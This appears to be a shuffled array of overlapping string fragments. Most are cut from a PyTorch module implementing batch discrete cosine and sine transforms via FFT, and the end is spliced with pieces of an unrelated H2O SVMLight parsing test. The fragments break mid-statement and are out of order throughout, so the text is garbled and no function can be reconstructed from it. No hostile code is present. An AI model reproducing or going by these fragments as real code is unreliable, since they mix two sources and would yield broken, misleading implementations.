\"\"\" Batch Discrete Sine Transformation without", "\"\"\" Compute permutation to generate following array 0, 2, 4,", "part \"\"\" # last dimension N = x.size(-1) if perm", "by zeros 3. Perform IFFT 4. Extract the real part", "== 1: y.squeeze_(0) return y def dct2_2N(x, expk0=None, expk1=None): \"\"\"", "normalization to coefficients. Compute idxst(idct(x)) @param x batch tensor, the", "length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0,", "from row-major to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder =", "perm=None, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization to", "by prosthaphaeresis relate products of trigonometric functions to sums. sin(a)", "expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2,", "x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then 1D", "idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Sine-Cosine Transformation", "dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None):", "leveraging fast fourier transform engine. The math here mainly uses", "Transformation without normalization to coefficients. It computes following equation, which", "coefficients. Compute 1D DST twice. @param x batch tensor, the", "N = x.size(-1) if expkp1 is None: expkp1 = get_expkp1(N,", "2D part is MxN @param expk_0 with length M, 2*exp(-1j*pi*k/(2M))", "sin(b) = 1/2 * (cos(a-b) - cos(a+b)) cos(a) cos(b) =", "Batch Discrete Sine Transformation without normalization to coefficients. Compute y_u", "from standard DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p,", "onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk is None: expk =", "N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x,", "idct_2N # normal way should multiply 0.25 x_reorder.mul_(0.5) y =", "1. permute x such that [a, b, c, d, e,", "Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3. Perform", "expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation without normalization to", "None: expk = get_expk(N, dtype=x.dtype, device=x.device) # get real part", "standard DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q}", "x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0])", "dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1)", "perm def dct_2N(x, expk=None): \"\"\" Batch Discrete Cosine Transformation without", "pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk", "part is MxN @param expk0 with length M @param expk1", "and then 1D DCT. @param x batch tensor, the 2D", "## # @file discrete_spectral_transform.py # @author <NAME> # @date Jun", "coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N", "Transformation without normalization to coefficients. Compute 1D DCT twice. @param", "expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1,", "for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder", "dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\" Batch", "y_{u, v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) =", "b] 2. Perform FFT 3. Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract", "pad second last dimension, excluding the complex number dimension x_pad", "DCT formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5))", "1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is", "dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None):", "batch 1D tensor for conversion @param cos_or_sin_flag 0 for cosine", "1/2 * (sin(a-b) - sin(a+b)) A 2D FFT performs y_{u,", "DCT twice. @param x batch tensor, the 2D part is", "https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros 2. Perform FFT 3.", "is slightly different from standard DCT formulation. y_{u, v} =", "x.view([1, N]) else: x_reorder = x.clone() # switch from row-major", "def get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) -", "0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1),", "Multiply by 2*exp(-1j*pi*u/(2N)) 4. Extract the real part \"\"\" #", "use sin because the real part requires subtraction # this", "part is MxN @param expkp1_0 with length M @param expkp1_1", "Discrete Sine-Cosine Transformation without normalization to coefficients. Compute idxst(idct(x)) @param", "y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return", "trigonometric functions to sums. sin(a) sin(b) = 1/2 * (cos(a-b)", "way should multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False)", "and 1 or sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\" #", "2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding", "0] z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def", "expk0).transpose_(dim0=-2, dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\"", "trick to solve IDCT with IFFT in the following link,", "need the imag part # this will be easier for", "# last dimension N = x.size(-1) if expkp1 is None:", "'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0) # the last", "complex numbers introduce a new dimension y = torch.irfft(x_pad, signal_ndim=1,", "y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def idct_N(x,", "with length N \"\"\" return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)", "following equation, which is slightly different from standard DCT formulation.", "requires subtraction # this will be easier for multiplication expk", "device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1)", "-cos and sin because we need the imag part #", "1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[...,", "dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return", "@param expk0 with length M @param expk1 with length N", "= x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch", "device=x.device) size = list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device)", "N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2,", "(N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\" Batch Discrete", "numpy as np import torch import torch.nn.functional as F import", "for cosine tranformation and 1 or sine transformation @param expk", "def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation", "The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make later", "expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D", "length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1,", "0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3, 1", "z[..., 0:N:2] = y[..., :(N+1)//2, 0] z[..., 1:N:2] = y[...,", "to coefficients. Compute idxst(idct(x)) @param x batch tensor, the 2D", "@param x batch 1D tensor for conversion @param cos_or_sin_flag 0", "sin because we need the imag part # this will", "dimension x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)", "cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device)", "y_{u, v} = \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute", "return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x,", "= torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0] = x x_reorder[..., 1:,", "formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))", "0) if len(x.size()) == 1: x_pad.unsqueeze_(0) # the last dimension", "math here mainly uses Prosthaphaeresis properties. The trigonometric identities exploited", "idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation without normalization", "switch back x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[...,", "# Must use IFFT here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[...,", "1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[...,", "= x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1]))", "to coefficients. Compute idct(idxst(x)). @param x batch tensor, the 2D", "(i, j) to (i, N-j), we can have (u*i/M -", "without normalization to coefficients. It computes following equation, which is", "\"\"\" Batch Inverse Discrete Sine Transformation without normalization to coefficients.", "expk.contiguous() def get_perm(N, dtype, device): \"\"\" Compute permutation to generate", "cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x batch tensor,", "if expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) size", "excluding the complex number dimension x_pad = F.pad(x_pad, (0, 0,", "4. Extract the real part @param x batch 1D tensor", "complex numbers introduce a new dimension y = torch.rfft(x_pad, signal_ndim=1,", "switch from row-major to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder", "N), 'constant', 0) # the last dimension here becomes -2", "real part requires subtraction # this will be easier for", "the 2D part is MxN @param expk_0 with length M,", "exactly the same. The actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\"", "normalization to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements", "- sin(a+b)) A 2D FFT performs y_{u, v} = \\sum_i", "1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1),", "@param cos_or_sin_flag 0 for cosine tranformation and 1 or sine", "torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) ==", "y def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse Discrete Cosine", "is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # get imag", "expk = torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N,", "neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos", "= torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x) z[..., 0:N:2]", "engine. The math here mainly uses Prosthaphaeresis properties. The trigonometric", "expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # get", "perm is None: perm = get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension()", "N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2,", "2N padding trick to solve IDCT with IFFT in the", "\\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding trick to solve", "MxN @param expk0 with length M @param expk1 with length", "normalization to coefficients. Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements", "part @param x batch 1D tensor for conversion @param cos_or_sin_flag", "coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the N", "return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) # return", "if len(x.size()) == 1: y.squeeze_(0) return y def idct_N(x, expk=None):", "Compute 1D DCT and then 1D DST. @param x batch", "sums. sin(a) sin(b) = 1/2 * (cos(a-b) - cos(a+b)) cos(a)", "match idct_2N # normal way should multiply 0.25 x_reorder.mul_(0.5) y", "is much faster than sum #y = y.sum(dim=-1) return y[...,", "last dimension N = x.size(-1) if expkp1 is None: expkp1", "numbers introduce a new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False,", "easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos,", "\\sum_j x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M +", "idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None,", "..., 3, 1 \"\"\" perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1]", "last dimension N = x.size(-1) if expk is None: expk", "expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization", "dim=-1) expk.mul_(2) return expk.contiguous() def get_exact_expk(N, dtype, device): # Compute", "# I swap -cos and sin because we need the", "y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting trick", "\"\"\" # last dimension N = x.size(-1) # pad last", "with length N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1),", "can have (u*i/M - v*j/N) inside exp. This will enable", "new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N]", "* (sin(a-b) - sin(a+b)) A 2D FFT performs y_{u, v}", "with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N))", "def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Sine-Cosine", "computing FFT twice. \"\"\" def get_expk(N, dtype, device): \"\"\" Compute", "to generate following array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1,", "same. The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make", "sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin", "device=x.device) x_reorder[..., 0] = x x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[...,", "1: y.squeeze_(0) return y def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch", "Batch 2D Discrete Sine Transformation without normalization to coefficients. Compute", "x_reorder = x.clone() # switch from row-major to column-major for", "get_expkp1(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the", "e, f, d, b] 2. Perform FFT 3. Multiply by", "x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is to", "introduce a new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False,", "-pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N, dtype, device): \"\"\" Compute", "y.sum(dim=-1) return y[..., 0]+y[..., 1] def idct_2N(x, expk=None): \"\"\" Batch", "None: perm = get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <= 1:", "(sin(a+b) + sin(a-b)) cos(a) sin(b) = 1/2 * (sin(a-b) -", "complex numbers introduce a new dimension # Must use IFFT", "formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))", "pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, sin #", "c, d, e, f] becomes [a, c, e, f, d,", "Sine Transformation without normalization to coefficients. Compute 1D DST twice.", "return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idcst2(x,", "length M @param expkp1_1 with length N \"\"\" return dst(dst(x.transpose(dim0=-2,", "Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same. The actual return", "= y.sum(dim=-1) return y[..., 0]+y[..., 1] def dct_N(x, perm=None, expk=None):", "onesided=False, signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return", "expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\" Batch 2D", "- v*j/N) inside exp. This will enable us to derive", "= torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk", "x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[...,", "M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return", "expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Sine-Cosine Transformation without", "sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\" # last dimension N", "cos(b) = 1/2 * (cos(a-b) + cos(a+b)) sin(a) cos(b) =", "x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick to solve IDCT", "= get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <= 1: x_reorder =", "x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick to solve DCT", "= torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size()) ==", "It computes following equation, which is slightly different from standard", "idxst_idct(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete Sine-Cosine Transformation", "N = x.size(-1) if perm is None: perm = get_perm(N,", "x_{i, j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))).", "Pad x by zeros 2. Perform FFT 3. Multiply by", "because we need the imag part # this will be", "with IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by", "perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1) def idct2_2N(x, expk0=None, expk1=None): \"\"\"", "1: y.squeeze_(0) return y def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch", "relate products of trigonometric functions to sums. sin(a) sin(b) =", "y.squeeze_(0) return y def idct_N(x, expk=None): N = x.size(-1) if", "coefficients. Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N", "sin(a+b)) A 2D FFT performs y_{u, v} = \\sum_i \\sum_j", "with length M @param expk1 with length N \"\"\" return", "expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Sine-Cosine Transformation without", "4. Extract the real part \"\"\" # last dimension N", "row-major to column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[...,", "# I use sin because the real part requires subtraction", "get real part y.mul_(expk) # I found add is much", "x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch back x_reorder.transpose_(dim0=-2, dim1=-1) y", "size = list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[...,", "if x.ndimension() <= 1: x_reorder = x.view([1, N]) else: x_reorder", "1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse", "= torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype,", "x.size(-1) if perm is None: perm = get_perm(N, dtype=torch.int64, device=x.device)", "coefficients. It computes following equation, which is slightly different from", "Transformation without normalization to coefficients. Compute 1D DST twice. @param", "# multiply by 2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) # pad second", "y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if len(x.size())", "signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :] if expkp1 is None: expkp1", "y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def dct2_2N(x,", "2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same. The actual return is", "onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk is None: expk =", "y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if", "is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # multiply by", "+ j sin(-2*pi*(u*i/M + v*j/N))). By mapping the original image", "def get_expkp1(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly", "becomes -2 because complex numbers introduce a new dimension y", "F import pdb \"\"\" Discrete spectral transformation leveraging fast fourier", "@param expk1 with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2,", "normalization to coefficients. Compute 1D DST twice. @param x batch", "1].mul(expkp1[:, 0]) - y[..., 0].mul(expkp1[:, 1]) return y def idst(x,", "1 or sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\" # last", "0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1),", "y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute", "uses Prosthaphaeresis properties. The trigonometric identities exploited by prosthaphaeresis relate", "exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N,", "\"\"\" Batch Discrete Cosine Transformation without normalization to coefficients. Compute", "Transformation without normalization to coefficients. Compute y_u = \\sum_i x_i", "sin(pi/N*q*(v+0.5)) Compute 1D DCT and then 1D DST. @param x", "Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same. The actual return", "= x.unsqueeze(-1).mul(expkp1) # pad second last dimension, excluding the complex", "x_reorder = x.view([1, N]) else: x_reorder = x.clone() # switch", "N \"\"\" return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1)", "0, expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1),", "because complex numbers introduce a new dimension y = torch.irfft(x_pad,", "y.squeeze_(0) return y def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D", "# this will be easier for multiplication expk = torch.stack([neg_pik_by_2N.cos(),", "different from standard DCT formulation. y_{u, v} = \\sum_p \\sum_q", "dtype, device): # Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j *", "= x x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0]", "Discrete Sine Transformation without normalization to coefficients. Compute y_u =", "tensor, the 2D part is MxN @param expkp1_0 with length", "1:N+1, :] if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype,", "to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the", "= \\sum_p \\sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DST", "length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\"", "get_perm(N, dtype, device): \"\"\" Compute permutation to generate following array", "c, e, f, d, b] 2. Perform FFT 3. Multiply", "x batch tensor, the 2D part is MxN @param expk_0", "[a, b, c, d, e, f] becomes [a, c, e,", "cos_or_sin_flag] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def", "normalized=False, onesided=False)[..., 0:N, :] y.mul_(1.0/N) if expk is None: expk", "N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)", "dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete", "''' Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to", "N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), expk_0).transpose_(dim0=-2, dim1=-1)", "= get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part y =", "permute x such that [a, b, c, d, e, f]", "1 \"\"\" perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0," ]
[ "\"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed", "the output (col 0) # random integer for class val", "num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList =", "print \"\\n\" + csvFilename # SUMMARY**************************************** # gives us some", "might fall short # track what max we really got", "need an output class, even if no cols are non-zero", "def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED, localhost SEED", "csvFilename # SUMMARY**************************************** # gives us some reporting on missing", "csvPathname # dict of col sums for comparison to exec", "[random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE = random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\"", "(dict) else: synColSumDict[colNumber] = val # sum of column (dict)", "synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: # k should", "= random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)", "specified well # figures out everything from parseResult['destination_key'] # needs", "# is it okay to specify col 0 in svm?", "is not equal to expected %0.6f' % (v, compare)) synMean", "svm! if (val > valMin/2) and (val < valMax/2): return", "unittest, random, sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse", "val # sum of column (dict) rowDataCsv = \" \".join(map(str,rowData))", "out everything from parseResult['destination_key'] # needs y to avoid output", "import unittest, random, sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts,", "SEEDPERFILE, sel, distribution): # we can do all sorts of", "(dict) rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary the eol", "eol ? # randomly skip some rows. only write 1/3", "val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) # did we", "csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect =", "requires telling h2o parse it's a libsvm..doesn't detect automatically\" parseResult", "= 0 for i in range(rowCount): rowData = [] d", "% (rowCount, num_rows)) # need to fix this for compare", "timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse", "# when we generate the dataset ### print \"\\nsynColSumDict:\", synColSumDict", "0.0)/rowCount # enums don't have mean, but we're not enums", "for class val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val", "DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols,", "of col sums for comparison to exec col sums below", "random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val # sum of column", "write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution): # we can do", "tryList = [ (100, 10000, 'cA', 300, 'sparse50'), (100, 10000,", "enums mean = float(inspect['cols'][k]['mean']) # our fp formats in the", "we can do all sorts of methods off the r", "it to be zero in this range. so we don't", "able to keep the list of fp sums per col", "colCount, SEEDPERFILE, sel, distribution) selKey2 = hex_key + \"_\" +", "sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel,", "the operations probably should have # been done in same", "number of cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k] print", "column should use this exprList = [ 'Result<n> = sum(<keyX>[<col1>])',", "= addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val and (colNumber", "automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print", "= addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) # did we add", "%s num_missing_values %d should be 0' % (k, num_missing_values)) if", "mean = float(inspect['cols'][k]['mean']) # our fp formats in the syn", "sometimes only have two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s", "'Result0 = 0', ] # the first column should use", "= random.randint(0, 